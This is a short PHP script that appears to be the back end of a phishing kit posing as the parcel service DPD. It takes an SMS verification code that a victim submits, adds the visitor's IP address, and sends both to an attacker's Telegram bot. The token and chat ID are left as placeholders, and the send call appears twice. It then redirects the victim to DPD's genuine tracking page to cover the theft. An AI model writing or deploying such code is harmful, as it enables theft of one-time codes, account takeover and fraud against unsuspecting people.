<?php
$ip = getenv("HTTP_CLIENT_IP");
$message .= "---- : || SMS2 || :------\n";
$message .= "SMS2: ".$_POST['sms']."\n";
$message .= "----: || THANKS BE TO GOD || :------\n";
$message .= "ip: ".$ip."\n";

$token = "YOURTOKEN";
file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=YOURCHATID&text=" . urlencode($message)."" );
$token = "YOURTOKEN";
file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=YOURCHATID&text=" . urlencode($message)."" );
header("Location: https://www.dpd.com/de/de/empfangen/sendungsverfolgung-und-live-tracking/#:~:text=Mit%20Eingabe%20Ihrer%20Paketschein-%20oder,bis%20auf%2030%20Minuten%20genau!");
?>